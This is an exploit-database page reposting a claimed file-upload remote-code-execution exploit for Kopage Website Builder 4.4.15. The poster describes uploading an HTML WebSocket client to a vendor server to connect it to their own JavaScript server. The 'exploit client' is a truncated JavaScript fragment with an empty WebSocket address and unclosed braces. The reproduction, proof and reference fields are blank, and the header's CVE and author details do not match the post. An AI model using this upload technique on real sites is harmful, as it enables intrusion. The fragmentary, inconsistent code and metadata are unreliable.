CVE Category Price Severity
CVE-2020-25232 CWE-434 $500 High
Author Risk Exploitation Type Date
Norbert Szetei Critical Remote 2023-12-10

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

## Title: Kopage-Website-Builder-4.4.15-File-Upload-RCE
## Author: nu11secur1ty
## Date: 12/08/2023
## Vendor:
## Software:
## Reference:,

## Description:
The file upload function suffers from file upload vulnerability, there is no strong sanitizing function for uploading some extension files.
In this case, I uploaded an HTML web socket client on their server and then I connected this client with my javascript server =)
Depending on the scenario, this can be the end of privacy and even worse than ever!
I am a Penetration Tester, not a stupid cracker! Thank you all!

STATUS: CRITICAL Vulnerability

[+]Exploit client:
(() => {
  const ws = new WebSocket('ws://')
  ws.onopen = () => {
    console.log('ws opened on browser')
    ws.send('hello world you are hacked :D')

  ws.onmessage = (message) => {
    console.log(`message received ${message}`)



## Reproduce:

## Proof and Exploit:

## Time spent:

System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at and
0day Exploit DataBase
home page:
                          nu11secur1ty <>

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.